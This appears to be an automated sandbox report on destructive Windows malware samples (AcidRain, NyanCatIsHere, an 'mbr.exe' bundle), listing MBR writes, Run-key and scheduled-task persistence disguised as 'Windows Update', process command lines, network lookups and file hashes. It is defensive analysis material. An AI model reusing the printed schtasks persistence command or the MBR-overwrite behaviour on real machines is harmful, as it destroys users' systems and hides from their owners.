| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\F84A.tmp\\mbr.exe" | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe
"C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F84A.tmp\F85B.bat "C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe
Magix.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x310 0x2cc
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im Magix.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe
bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe
test.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3804 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe
rgb.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe
snd.exe
C:\Windows\system32\timeout.exe
timeout 50
C:\Windows\system32\taskkill.exe
taskkill /f /im rgb.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im snd.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe
gl1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 65
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 211.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\F85B.bat
| MD5 | 66f47a843ad967cd8824d29bbca65017 |
| SHA1 | d5a01629302123b6289a7bd677035ed5e237baaf |
| SHA256 | 3f2b8da496e474625ade273d664cf76b8a1b8ea2ba42e8656e92b7819793cab9 |
| SHA512 | 1e151e4e1fb69aa7311d8b754e435972e7f6bf47fbf4ad3a06516821b5d5a698e80cb03cec022137643c4c38d09527c5adfbe3846962f71cc7797c81093f034e |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\prompt.vbs
| MD5 | a1b56af69ace7a3738f2aeec477c4a33 |
| SHA1 | bfec32c379a396612d16624c8548943647d15c96 |
| SHA256 | 3c5331020e62e93f1ea06df0f227af2a5dd2355307be8e728282e9ddf5a1962c |
| SHA512 | ffaff006ca9115cb259fa92309836c08b9772f6d65907236bc210532ff4dd2b38c635175d346d6818266364f6c1e5a2109e01f841594222bac10f9f890f7c337 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe
| MD5 | a15d67f06d5bb68b5a22283d84fb5077 |
| SHA1 | 3fd6fd5f561e1a540d3d24956e1e61d6a31f0a68 |
| SHA256 | 7d36b6c3cefa53f821f955a7a47d11db0a10d781e0ca2d2d2217feca4fc9c235 |
| SHA512 | 6ff79aac54e27d41f3323bea8c3f305a8b64d88fe9fa11e7eb39913242b731821020de11b7c759ba8cdf0241746ffa2eb29e02eb8e523f1c06b592dbac474e2e |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe
| MD5 | 445d48408fd9cb1bcadfb8243027a12b |
| SHA1 | cb1382d3870a4a821ce8e731d9401f7ba0c0da40 |
| SHA256 | 7a5b8795aed94dca80cc5e956f1b409135735637cc556c7b533acd6b2fbaee58 |
| SHA512 | b89d121f13a574d6b51125cb7b35ad68af22eeaa7b68b8cfbdcbdd228b941235a8a841906023274d93ee68ab64ca59251f6f7ffb2b59034616879e111359297f |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe
| MD5 | 026992ed7c38fae57e8839a6c0d883c8 |
| SHA1 | 9b389aa3dd774f3cfff3dcbe8ea8779ef005b31f |
| SHA256 | 68cb1fe2ee7c3f69fe2d508d117b502ed19337bd332e722605e491a823f89645 |
| SHA512 | d20fe47538b9e1fa0ccf198f5a4a31506cc59622b2492e9f64435fb06b66ccf93cde056693656da626ebf56ab434425fbf3291db979fe6c67b2a7a14649d9dc7 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.wav
| MD5 | d6c579826cfdb4716612eefb5ee07c78 |
| SHA1 | a179e34b8811935942846451b98064c973c02c1a |
| SHA256 | aa2e99a722498dbc75870a1abc7a351da46b1bde1b349148efb5a237312c46fd |
| SHA512 | ada16dfef3f9e264108dff6ee975b79f38a38a733cff82b788897a140fa197f6816be1bea0ef425a56380d03fd6d45652ae4c8fbaef1a964bb1b7055af989c10 |
memory/2876-43-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2796-44-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2852-45-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2852-47-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2852-49-0x0000000000400000-0x0000000000413000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe
| MD5 | 6b673ece600bcc8a665ebf251d7d926e |
| SHA1 | 64ef7c73a713bf3c55fb4ac4e5366a7a425f1b4e |
| SHA256 | 41ac58d922f32134e75e87898d2c179d478c81edaae0d9bc28e7ce7d6f422f8b |
| SHA512 | feb18a1aa72de47fd67919e196abd200afdf22ad5a7e5dac20593252d8b2ca86982bb07c2fed3681ef06c9933c6d197590c1df65aa5df93cb6abafca5e53e9ff |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe
| MD5 | 64a69d3a6620009ebe49595a5d8d119e |
| SHA1 | 4d478712f6503dc7f32e600d7b5aa0118c83214d |
| SHA256 | 199e4e84b644b264d170b04945880f095790206c65fdfb5a88c8ab73bd29357d |
| SHA512 | b2e6ace579201f74abea5d4aecf416980ab028d1876ffc57e474b2b2142489ec4589a4c151eafa4a9067b446396829a370c882b0d40ab8073ad7ff266bd6653f |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.wav
| MD5 | cea9d2316f0e62a4fe233d6d9445fc53 |
| SHA1 | b058e7d7d96b717e6a47606eb6f632c4444ff800 |
| SHA256 | f61e579cdd011ea354c4d19bdfe140df9870f372ebe7b3ec747140a0771fe1a1 |
| SHA512 | e73aaeae358dc340c046f61dd29a629a3b2a20ebed7966a1d92da820c484154093bf42330cd0e0ad96373d2a25d1f0237abd8e34cdfd3ca9ccb3d6d310400394 |
memory/4064-57-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe
| MD5 | bfc9e8ab494313d6efb67fc8942f5ee9 |
| SHA1 | 1b42cc97803221538e020cb90517cb808cf19381 |
| SHA256 | 33cbdb6e00f3f42f58502af8a9150604a44bb9b26825c909aa0edb5c744a1f13 |
| SHA512 | 2d01f92397b65eade1f6140f80e2cb626b3e53b112c7e77e84ea7f6092b07c05eacb9e5e9bcb4676c8bdd10fcfba4fe297f2a01eedffffa594af87839baae030 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe
| MD5 | 7baad7b6dcd387183540a1a771e1b8d5 |
| SHA1 | 8fb4bc170b6e3050135e0c7b651441dbe963d7fc |
| SHA256 | 57e598fa7a93d50258afb6e563266521ae0bd35e6f80b247eb24a31a56a32461 |
| SHA512 | cfb85b10af70cc053a7c31a5d64741286b64eebd8ac9f3a97e6ed9989e81c629041808ce337d7b8c590f069da9a05e38e9b8dcf89b70e561362bff010732800b |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\noise.wav
| MD5 | 5144895869d5441a2a997bdb6d1b8576 |
| SHA1 | 357c7710b18c60ac13538506e43c4558c1422252 |
| SHA256 | 2cf498b82d0d0c51cf10a82e7221d24ad4afd378f31f79253261729e71e95b73 |
| SHA512 | 1c6d6cec3c2b9666b2c673fdda49eb431d2d321d77c7ce82a8033ff05dedb30a4145deec85f56235db1ad07b3540125b8d33fafc13f9e0569e55ea49a207215f |
memory/1504-68-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4392-69-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe
| MD5 | ac0cdb57f020158a4f356f0f819ac9a8 |
| SHA1 | 2fa07803943314ff4ff9a6ece448caccf327db54 |
| SHA256 | a47b0210f10011d86c59f19f929a860eaa2bd363ec1e01927c4edad404656b4b |
| SHA512 | a12a7441a107df43682bfe581d56891910bf8906b18a4049e822828c5d6d376e32ee69fc7f983afe98e9c1067e2962fa2895b643e4699568c4e053d89ca7b1eb |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
memory/2176-84-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4156-85-0x0000000000400000-0x0000000000409000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
140s
Max time network
193s
Command Line
Signatures
Disables Task Manager via registry modification
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259457664 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NyanCatIsHere.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\Total = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "25" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000643978e0fa32ab2a726da7b5341c88db8eb55271660135a44dbfca952f45c9c3000000000e8000000002000020000000a92116c5fbbb634f49f00286edfd3ef6d6d4a143f96e9184d0817f4a62dea3e4200000002392cd3a10dcab0a19a4b0fdd9d67e8075372cddf77769f5b1fe6ade8199cd3d40000000238f92f17e549db036b894ac49280684eedde535e8d2634cef8349dba4ed3e20e9a6d7bede43d4b7f18abcf52f585426657fe5e0d50eaff11a5b971faab96894 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415573405" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "25" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
